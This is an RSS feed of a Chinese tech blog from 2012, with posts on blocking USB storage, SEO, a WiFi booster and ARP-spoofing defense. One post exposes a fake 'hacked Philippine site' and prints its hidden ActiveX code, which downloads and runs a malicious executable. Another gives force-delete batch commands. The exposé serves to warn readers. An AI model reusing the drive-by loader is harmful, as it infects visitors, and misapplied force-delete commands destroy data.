<![CDATA[追梦's Blog ]]> http://www.f980.com/ zh-cn www.emlog.net 封禁USB、禁止USB、封掉USB、停用USB端口的方法 http://www.f980.com/?post=52
有的公司要求封禁所有电脑的USB接口,但是保留打印机和鼠标键盘的接口,经过多方查资料,总结了一些,不敢藏私,拿出来与大家分享

方法一:

隐藏分区

运行——regedit进入注册表,依次打开

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]

在右窗口中新建一个二进值的键值名为“NoDrives”,磁盘驱动器所一一对应的键值如下:A驱为“01000000”,B驱为“02000000”,C驱为“04000000”,D驱为“08000000”,E驱为“10000000”,F驱为“20000000”。即按磁盘驱动器的英文字母顺序(A-Z)从十六进制的二倍数递增。将您所要隐藏的磁盘驱动器所对应的键值按十六进制相加赋值给“NoDrives”,这样,就在“我的电脑”内隐藏起所要隐藏的驱动器了。我的电脑分三个区,即C,D,E区,我把键值改为e2 ff ff ff,这样就把A,B,F往后的分区全部隐藏,插上优盘后,在我的电脑里面看不到优盘,自然就无法操作了,不过如果在地址栏中输入复盘,还是可以打开的,所以,这只是障眼法而已

方法二:

禁用USB口

如果用户已经使用过USB存储设备,我们可以通过更改注册表(REGEDIT)子键来实现。

运行注册表(REGEDIT):[HKEY_LOCAL_MACHINE\SYSTEM\CurrentCntrolSet\Services\USBSTOR],在右侧的窗格中找到名为“Start”的DWORD值,把3改成“4”,重启,隐藏U盘盘符。

方法三:

在组策略里面(运行:gpedit.msc) 计算机配置——管理模板——系统——可移动存储访问 禁止可移动磁盘的各种权限



第一方法只是隐藏达不到真正屏蔽的效果

第二个方法只能屏蔽使用过的设备,新设备插上去同样可以用。

第三种方法也是不能完全过滤所有设备。

其他方法:

在系统盘找INF文件夹 里面有USB各种接口的驱动 权限去掉就可以了 要用的时候还可以找回来 其他的USB接口的东西也可以用

例如:C:\WINDOWS\system32\drivers

这个只是禁掉移动存储,不影响USB的其他设备使用的,比如键盘/鼠标/打印机等等。。。

原理就是不加载USB存储的驱动,其他USB设备的驱动照常加载....

终极方法:

直接在主板BIOS里面将USB Disable,然后给BIOS加个密码不就行了.具体情况视BIOS版本而定.

缺陷:似乎是全部都禁用了USB接口,usb disable 了,你的usb鼠标,打印机怎么用?

另类方法:

如果用户还未使用过USB存储设备,我们可以按如下方法操作。

该方法适用于电脑新安装后从来没有接过USB存储设备(即一次都没接过U盘之类的介质,当然打印机扫描仪等等不带存储功能的产品不算)。

打开:C:\WINDOWS\inf,找到USBSTOR.INF和USBSTOR.PNF两个文件。

设置权限:

右键点击该文件,在弹出菜单中选择“属性”,然后切换到“安全”标签页,在“组或用户名称”框中选中要禁止的用户组,接着在用户组的权限框中,选中“完全控制”后面的“拒绝”复选框,最后点击“确定”按钮。

再使用以上方法,找到“usbstor.inf”文件并在安全标签页中设置为拒绝该组的用户访问,其操作过程同上。

完成了以上设置后,该组中的用户就无法安装USB设备驱动程序了,这样就达到禁用的目的。

或删除:

将USBSTOR.INF和USBSTOR.PNF两个文件的文件名或扩展名更改为任意名称,或者将文件直接删除,更改扩展名的好处在于下次你想为客户端开通USB端口时可以再将扩展名改回就OK了]]> Sat, 19 May 2012 07:13:01 +0000 追梦 http://www.f980.com/?post=52 白激动一场,还以为真要开战了 http://www.f980.com/?post=51 ]]> Fri, 11 May 2012 10:40:06 +0000 追梦 http://www.f980.com/?post=51 谈谈www.pei.net.ph仿冒入侵菲律宾 http://www.f980.com/?post=49

 菲律宾事件后,网络上闹的沸沸扬扬,当然有一些爱国青年,无论所谓红客,黑阔,只能说做信息安全的,还是做了一定的反击,当然也攻破了部分菲律宾政府的某些网站,当然一想起传说中的菲律宾政府被攻破,如果安全圈里的基友们,第一个能想起的估计是"小A"了,也不知道这家伙到底哪里高就去,哈哈,一年联系不上他了,莫非被和谐了??(好了主题不跑偏说正事)
  
   当红阔,黑阔攻破菲律宾政府网站的同时嘛,淫家虽然安全不到位,但是发现一定会被改回的,圈内如果参与过"伊朗网军"反击战事件的盆友们,应该很了解,攻破,篡改,改回,再篡改的过程,技术领域虽然菲律宾政府技术不到位,但是管理人员改回的能力还是有的,之后很多人就要问,最近经常看到www.pei.net.ph 这个自称攻破菲律宾政府网站为什么迟迟没有改回呢?而且大肆宣传呢?其实很多技术圈的人都明白这道理,不过对于不知道网络技术的人,就过度的膜拜了,还以为真正遇到传说中的大神,管理员都改不回来?呵呵,很简单,这只是一个炒作的自慰站!
  
   有技术的大牛黑站,挂黑页走人,留名就好,没技术的,只能想想办法,用别的来炒作炒作,当然炒作也要有利益的,要么是名义上的利益,要么就是实际性的利益.当然介绍这个的时候,我们可以整体分析一下对于这个站的基本思路,首先net.ph域名为菲律宾国家域名没错,但是其注册只需要有一个可以开海外接口的IDC就可以注册,当然你也可以选择去狗爹注册,国内无法查询whois 但是国外接口可以,查询whois信息,时间有心的自己查吧,今年的米,呵呵  
 

疑点1.

笔者进行了GOOGLE搜索和百度搜索,发现没有任何搜索引擎以前的收录记录,试想一个国家的网站,访问量应该很大,而且从这个网站运作,应该就被搜索引擎收录过,笔者发现了上次快照更新时间已经是昨天了。那么,一个国家的机要网站,在发现自己被黑后一天都没人处理,难道他们国家没有技术人员了吗

疑点2.
笔者通过查询了源代码和主机地址,发现网站http://lamitan.gov.ph/服务器放置地在美国。??
然后该网站还被挂了马。试想自己黑了给那么多华人看,攻击的人需要挂马害自己人吗,显示这个事情有猫腻。我们查看了源文件,发现了这样一段代码:

<BODY><OBJECT ID="*ActiveX1" WIDTH="0" HEIGHT="0" CLASSID="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61" CODEBASE="*ActiveX.cab#Version=1,0,0,1"><PARAM NAME="propProgressbackground" VALUE="#bccee8"><PARAM NAME="propTextbackground" VALUE="#f7f8fc"><PARAM NAME="propBarColor" VALUE="#df0203"><PARAM NAME="propTextColor" VALUE="#000000"><PARAM NAME="propWidth" VALUE="0"><PARAM NAME="propHeight" VALUE="0"><PARAM NAME="propDownloadUrl" VALUE="http://www.sulu.gov.ph/admin/cal/135pk.exe"><PARAM NAME="propPostdownloadAction" VALUE="run"><PARAM NAME="propInstallCompleteUrl" VALUE=""><PARAM NAME="propbrowserRedirectUrl" VALUE=""><PARAM NAME="propVerbose" VALUE="0"><PARAM NAME="propInterrupt" VALUE="0"></OBJECT></script></body></html>

疑点3.

我们下载了这个135pk.exe文件 上传到了查毒网,全部显示为病毒。而且如果是菲律宾官方挂的,也不用自动隐藏下载打开吧,文件有350KB 也不像是什么插件之类的。攻击的网站也不是菲律宾政府官网,而真正的官网应该是:www..gov.ph

然后我们在网上查到了.ph的菲律宾域名80元即可注册购买,因此。该事件在没有得到论证以前请没有经验的用户不要去打开。被钓鱼就麻烦了。

以上三个疑点说明 有人故意做了假网站,跟随菲律宾能源网站被黑一事在自己谋利。谋什么利呢,我们进群发现群管理不断发内容招人。招学员之类的。这个.....不用继续往下说了吧  
   好吧,总结一下,有人故意做了这样一个挂着自解压病毒的黑页独立页面网站,以黑了菲律宾政府网站为由,用着随意人就可以注册的域名架设了这样的一个站,用以何为?大肆宣传有多少人中了这135pk?肆意宣传只是为了更多人的访问,多一个访问就能多抓一只肉鸡,很多人不理解为什么杀软没报毒,如果你现在换成卡巴斯基去查毒,你看能不能查到DIE的蠕虫病毒,菲律宾政府网站为gov.ph 米,跟中国的gov.cn 异曲同工, .PH域名国外接口注册80元每年, 独立IP VPS,低配1G 正常市场价格在60 -100元/月,但是换来的肉鸡是多少?每天有多少人来点击这个网站,成为获益的肉鸡呢?
  
     不管谁是这个幕后的Jason.Mr.X ,收敛点吧,别拿着你自慰的站点坑害国人,呵呵,没品没德没技术你也只能搞这点小动作了!
  
   飞了宾的破逼网站被黑了是该高兴,但是也要看看什么目的是黑站的,对于这样的人,我们只能以唾骂来形容不耻行为,好自为之吧!孩子! 

 

]]> Thu, 10 May 2012 09:45:03 +0000 追梦 http://www.f980.com/?post=49 秒杀一切文件批处理 http://www.f980.com/?post=48 有时候,我们在使用电脑的时候经常会出现这样一个问题:有一个文件夹,很奇怪的,鼠标放上去,显示“文件是空的”,每次删除都会提示“无法删除 文件:无法读源文件或磁盘”,删除不掉,真是麻烦。
想了其他的办法,还是删除不掉他。今天,我带来这个批处理,简简单单秒杀一切文件。
DEL /F /A /Q \\?\%1
RD /S /Q \\?\%1
新建一个文本文件,把上面的命令输入进去
然后另存为某某名.bat。然后将需要删除的那个顽固文件拖到这个bat文件的图标上就可以删除掉了。

下面来解释下这句批处理的意思:
该命令是windows命令行命令
DEL,删除一个或数个文件。
DEL [/P] [/F] [/S] [/Q] [/A[[:]attributes]] names
ERASE [/P] [/F] [/S] [/Q] [/A[[:]attributes]] names
names 指定一个或数个文件或目录列表。通配符可被用来
删除多个文件。如果指定了一个目录,目录中的所
有文件都会被删除。
/P 删除每一个文件之前提示确认。
/F 强制删除只读文件。
/S 从所有子目录删除指定文件。
/Q 安静模式。删除全局通配符时,不要求确认。
/A 根据属性选择要删除的文件。
attributes R 只读文件 S 系统文件
H 隐藏文件 A 存档文件
- 表示“否”的前缀
如果命令扩展名被启用,DEL 和 ERASE 会如下改变:
/S 开关的显示句法会颠倒,即只显示已经
删除的文件,而不显示找不到的文件。
-------------------------------------
如果熟悉Dos命令的,就明白这句批处理的恐怖之处。。别用于做坏事。。。这句批处理,对于一些顽固文件还是很有效的。]]> Tue, 08 May 2012 08:34:20 +0000 追梦 http://www.f980.com/?post=48 百度网盘邀请码2 http://www.f980.com/?post=47 http://pan.baidu.com/netdisk/beinvited?invite_code=4b9737832d1ceae9ad36d2069dbed00c

 

http://pan.baidu.com/netdisk/beinvited?invite_code=cde1283362fa4f22cf7add7386984220

 

http://pan.baidu.com/netdisk/beinvited?invite_code=07623b1be10c6b10884fdc8f09596bb2

 

http://pan.baidu.com/netdisk/beinvited?invite_code=2d3f1f20de8c2d2ca846034340130d28

 

http://pan.baidu.com/netdisk/beinvited?invite_code=3f09cc3215a664a0847dbd34b744470f

 

http://pan.baidu.com/netdisk/beinvited?invite_code=ca7b71eb7d176fe1afc32c34f283c463

 

http://pan.baidu.com/netdisk/beinvited?invite_code=6996756a5911f60b28279c91a4c8e201

 

http://pan.baidu.com/netdisk/beinvited?invite_code=45adbefc809882b56b38664e7c59fb98

 

http://pan.baidu.com/netdisk/beinvited?invite_code=33509995badb2a3dfab61192be85ca8e

 

http://pan.baidu.com/netdisk/beinvited?invite_code=3902c34b494018a6c0cef4227945f9f5

]]> Mon, 07 May 2012 06:06:46 +0000 追梦 http://www.f980.com/?post=47 软文的具体操作手法 http://www.f980.com/?post=46

软文出发点:一切都要为用户体验着想

第一、针对用户

SEO初学者

1.软文写作:浅显易懂。如果是技术文章,有一个清晰步骤,分部讲解,尽量一目了然,让用户更加明白。

2.了解用户想要什么

  通过论坛、问答平台(百度知道 soso问答)、朋友网等了解用户需求

  论坛里:热门帖子

  百度贴吧:排名第一、关注同行业贴吧

第二、怎么写软文

1.标题 标准:10个字以内,用户敏感关键词 通过数据分析,写入吸引用户的关键词:“关键词、排名、快照”等敏感词汇 (带来点击量)

2.文章内容

  段落清晰、字数500——1000字左右、 互动、具有附加价值、锚文字的链接、引导用户进入我们的网站

3.选择发布地

相关行业高权重平台 例:服装行业 服装论坛

百度新闻搜索行业词 例:计算机

]]> Wed, 02 May 2012 14:37:30 +0000 追梦 http://www.f980.com/?post=46 易拉罐增强WiFi信号的方法 http://www.f980.com/?post=45   日前, 论坛上一则网帖《易拉罐自制WiFi信号放大器~~技术宅拯救世界啊!》被火速传播,网帖称,无线路由器套上一个易拉罐版的山寨信号放大器后,信号强度会增强。
  “技术宅伤不起!”“强大网友有文化!”楼下跟帖者很多,但多数网友还是抱着怀疑的态度。昨日,本报好奇实验室进行了这个实验,实验证明:路由器套上易拉罐后,无论是笔记本还是手机,信号都得到加强。
  潇湘晨报记者文乃斐长沙报道
  实验地点:高桥大市场附近一小区
  实验时间:2011年11月9日下午
  实验人员:技术控杨先生

  实验工具:一到两个易拉罐,一把刀,一把剪刀,一个无线路由器,一个带WiFi信号的手机,一台有无线网络的笔记本电脑

点击查看原图

点击查看原图

点击查看原图

点击查看原图

点击查看原图

易拉罐怎么变成传说中的信号放大器
  步骤一:选取铝制易拉罐,将罐子冲洗干净,去掉易拉罐上的环扣;
  步骤二:将罐底整个切除,铝制薄片非常尖利,容易伤手,操作时要小心;
  步骤三:将罐头切开一部分,保留1cm左右不剪,这1cm的位置选择靠近易拉罐饮水口;
  步骤四:在未剪部分的正对面画一条竖线,按此竖线将瓶身剪成两部分;
  步骤五:将瓶身展开成扇形,罐身倒放,将无线路由器天线插进易拉罐的饮水口;
  步骤六:如果路由器的天线超过易拉罐瓶身,最好再按以上步骤制作一个,套在第一个易拉罐外面。
  [笔记本测试]
  实验环境:杨先生拿着笔记本电脑走进房间A,该房间与无线路由器中间还有一间门窗紧闭的房间B,房间长约7米。也就是说,电脑与无线路由器相隔2堵墙和7米长的空间。
  实验一:没套上易拉罐前,笔记本的无线信号为4格。
  实验二:将易拉罐套上无线路由器,5秒钟不到,信号强度顿时变为5格。
  实验结果:路由器在加上自制易拉罐信号放大器后,虽然相隔2堵墙,但信号得到明显增强。
  [手机测试]
  实验前,杨先生在手机上下载了一款WiFi信号检测软件,用于精确测验信号强度。
  实验环境:杨先生将手机正对无线路由器,距离相隔3米。
  实验一:没有套上易拉罐,该信号强度为-58dBm
  实验二:套上易拉罐,信号强度则为-44dBm
  实验结果:在近距离的情况下,套上易拉罐,手机上的信号得到了增强。
  注:该WiFi信号检测软件使用说明:用于检测手机WiFi信号强度,强度单位是dBm(毫瓦分贝),一般用负数表示,正常信号变化范围是从-110dBm(差)到-50dBm(好)之间。
  [释疑]
  易拉罐内表面能反射无线电波
  为什么易拉罐版山寨信号放大器能放大信号呢?
  “理论上说,确实可行。”中南大学信息学院信息与通信工程专业博士生董健介绍,实验原理是易拉罐的内表面反射了无线电波,加强了天线的发射和接收信号的能力。“它相当于把分散的信号集中到一个方向。但易拉罐的背面相对应地减弱了部分信号。”
  易拉罐怎么放置,才能达到信号最大化呢?董健说,确实有一个“最佳位置”,“根据易拉罐弯曲的形状确定出一个焦点,该焦点就是天线放置的位置,但要算出焦点的位置,计算起来要费些功夫了”。

]]> Wed, 25 Apr 2012 13:41:48 +0000 追梦 http://www.f980.com/?post=45 论坛签名必须要注意的问题 http://www.f980.com/?post=44 论坛签名是现阶段SEOer使用最多的一种增加网站外链的形式,门槛低、见效快,是很多SEOer刚开始接触SEO就是从发外链开始,我也是从外链开始的,下面就和大家分享论坛签名的六大误区:

数量取胜

新手SEOer在**坛签名的时候每天都不断的去发外链,但是百度外链只要一更新就大起大落,有喜有忧但是不管是大涨还是大落基本网站都会有一定的降权,这样的结果直接导致网站关键词的排名有很大的变化,这样导致网站不稳定,所以在每天几百外链的同时一定要主要不能以数量取胜这样会导致你发的快掉的也快。

帖子内容

伪原创充斥着整个SEO论坛,帖子内容是非常重要的,如果你的签名全部是留言的话而且是通俗的留言像:“楼主辛苦了,定一个,好帖子等等”这种一句话的留言往往令人担忧,这中发帖的方式导致你的外链。权重和收录几率就很小,而且丢失率很高,因为你今天顶的帖子可能几天后就在几十页啦,那时候你的页面权重就会降低,导致收录的也会被百度删除。在内容方面来讲如果你认真发布每一个帖子不断增加帖子的质量这样会让你的帖子权重增加而且受众喜欢的话你的帖子基本上就能继承大部分的权重。

更新时间

我的一个朋友在论坛签名这方面就是个典型的例子,他有时间的时候每天一顿发,发布帖子和顶贴大概在500条左右,没时间的时候一个月都不发一条帖子,导致网站排名也在不断的做过山车运动,这个问题其实很严重,同时这也是强调了SEOer的执行力的问题,每天不要太多,每天几十个就好了,关键是你的帖子质量要提高引起读者兴趣才行

签名范围

很多SEOer在发布外链的喜欢去站长网,5论坛等等比较有名的论坛,但是始终都是围绕在这几个网站发布,外链范围非常局限,导致一旦某个网站的账号被封了或者禁言了,这个网站外链丢失率就会超过1/3,这样往往会导致网站降权,所以网站外链必须要广泛性,你网站的外链不能被几个网站控制。

有效性

论坛签名有各种显示方式,有直接可以加锚文本的,也有直接加超链接的,也有直接加网址和文字的,大多数不同的论坛等级不同也是签名的形式也是不同的,但是很多都支持的是直接放网址和文字,这种没有超链接,基本上对增加网站权重没有多大的最用,只能起到推广的作用和流量的作用,所以论坛链接也分有效链接和无效链接。

长久性

外链的长久性是SEOer最想要的结果,也就是发了链接永远不被删除的,呵呵,论坛签名是短期的外链效果,见效快但是掉的也很快,这个就增加了SEOer工作量,必须要每天来论坛发外链,所以短期外链在人员充足的情况下才能做。在人员和成本的考虑下我们尽量还是做长期的外链方法,长期外链的途径一般有博客,空间,以及权重高的像百度贴吧,百科,知道等,这些都是长期外链对于工作量会节省很多。 ]]> Wed, 18 Apr 2012 05:57:48 +0000 追梦 http://www.f980.com/?post=44 新站如何快速获得百度权重 http://www.f980.com/?post=43 1. 网站速度:建议网站备案,商务通,统计工具等只挂一个,对页面打开速度有好处。图片过大也会影响网站打开速度。
2. 程序:动态路径参数过多对网站不利。
3. 首页关键词:关键词过多会分散权重。从而标题和内容的匹配度下降,从而让排名得不到更好的体现,一般新站规划2-3个主关键词。等这些词有排名了再考虑加其他的。后期加了词到title,那就是相当于改title了,对网站有害没有?
4. 回链:在页面底部或其他位置给本页面做链接,比如首页给首页做链接。建议不做回链,这相当于作弊行为,对刚上线的新站的考核期加长,或者被K。
5. 文章里面的锚文本:这被判断为作弊的行为,因为在导航,面包屑等地方已经有指向首页的了。建议在面包屑导航的首页位置加上一个指向首页关键词的锚文本,这样也可以保证每个页面有指向首页的链接。
6. 内容:文章的更新导致首页不停得更新,快照更新就加快了。新站原创或者伪原创,不然很难通过考核期获得权重。内容更新频率越高,快照越快,因此,我们在做内容的时候,要有频率更新。
7. 外链:
A. 友情链接,新上线的网站不做友链,原因是权重的攀升过快,超过了]]> Thu, 22 Mar 2012 13:28:23 +0000 追梦 http://www.f980.com/?post=43 网关绑定IP和MAC地址防止ARP攻击 http://www.f980.com/?post=42 服务器所有网站打开时都报病毒,替换工具查不到恶意代码,杀毒无效,快整疯了,猛然觉醒这是网段内ARP攻击搞的怪呀。网上小搜了下,除了装ARP防火墙以外,还可以通过绑定网关的IP和MAC来预防一下。这个方法在局域网中比较适用:



你所在的局域网里面有一台机器中了ARP病毒,它伪装成网关,你上网就会通过那台中毒的机器,然后它过一会儿掉一次线来骗取别的机器的帐户密码什么的东西。


下面是手动处理方法的简要说明:


如何检查和处理“ ARP 欺骗”木马的方法

1.检查本机的“ ARP 欺骗”木马染毒进程


同时按住键盘上的“ CTRL ”和“ ALT ”键再按“ DEL ”键,选择“任务管理器”,点选“进程”标签。察看其中是否有一个名为“ MIR0.dat ”的进程。如果有,则说明已经中毒。右键点击此进程后选择“结束进程”。参见右图。


2.检查网内感染“ ARP 欺骗”木马染毒的计算机

在“开始” - “程序” - “附件”菜单下调出“命令提示符”。输入并执行以下命令:

ipconfig

记录网关 IP 地址,即“ Default Gateway ”对应的值,例如“ 59.66.36.1 ”。再输入并执行以下命令:

arp –a

在“ Internet Address ”下找到上步记录的网关 IP 地址,记录其对应的物理地址,即“ Physical Address ”值,例如“ 00-01-e8-1f-35-54 ”。在网络正常时这就是网关的正确物理地址,在网络受“ ARP 欺骗”木马影响而不正常时,它就是木马所在计算机的网卡物理地址。

也可以扫描本子网内的全部 IP 地址,然后再查 ARP 表。如果有一个 IP 对应的物理地址与网关的相同,那么这个 IP 地址和物理地址就是中毒计算机的 IP 地址和网卡物理地址。


3.设置 ARP 表避免“ ARP 欺骗”木马影响的方法

本方法可在一定程度上减轻中木马的其它计算机对本机的影响。用上边介绍的方法确定正确的网关 IP 地址和网关物理地址,然后在 “命令提示符”窗口中输入并执行以下命令:

arp –s 网关 IP 网关物理地址


4. 静态ARP绑定网关

步骤一:

在能正常上网时,进入MS-DOS窗口,输入命令:arp -a,查看网关的IP对应的正确MAC地址, 并将其记录下来。

注意:如果已经不能上网,则先运行一次命令arp -d将arp缓存中的内容删空,计算机可暂时恢复上网(攻击如果不停止的话)。一旦能上网就立即将网络断掉(禁用网卡或拔掉网线),再运行arp -a。

步骤二:

如果计算机已经有网关的正确MAC地址,在不能上网只需手工将网关IP和正确的MAC地址绑定,即可确保计算机不再被欺骗攻击。

要想手工绑定,可在MS-DOS窗口下运行以下命令:

arp -s 网关IP 网关MAC

例如:假设计算机所处网段的网关为192.168.1.1,本机地址为192.168.1.5,在计算机上运行arp -a后输出如下:

Cocuments and Settings>arp -a

Interface:192.168.1.5 --- 0x2

Internet Address Physical Address Type

192.168.1.1 00-01-02-03-04-05 dynamic

其中,00-01-02-03-04-05就是网关192.168.1.1对应的MAC地址,类型是动态(dynamic)的,因此是可被改变的。

被攻击后,再用该命令查看,就会发现该MAC已经被替换成攻击机器的MAC。如果希望能找出攻击机器,彻底根除攻击,可以在此时将该MAC记录下来,为以后查找该攻击的机器做准备。

手工绑定的命令为:

arp -s 192.168.1.1 00-01-02-03-04-05

绑定完,可再用arp -a查看arp缓存:

Cocuments and Settings>arp -a

Interface: 192.168.1.5 --- 0x2

Internet Address Physical Address Type

192.168.1.1 00-01-02-03-04-05 static

这时,类型变为静态(static),就不会再受攻击影响了。

但是,需要说明的是,手工绑定在计算机关机重启后就会失效,需要再次重新绑定,不过也可以写个批处理,拖到启动中。脚本如下:


@echo off
arp -s192.168.1.1 00-01-02-03-04-05
end


保存为*.bat的文件。放在开机启动中。

要彻底根除攻击,只有找出网段内被病毒感染的计算机,把病毒杀掉,才算是真正解决问题。 ]]> Sat, 17 Mar 2012 07:39:46 +0000 追梦 http://www.f980.com/?post=42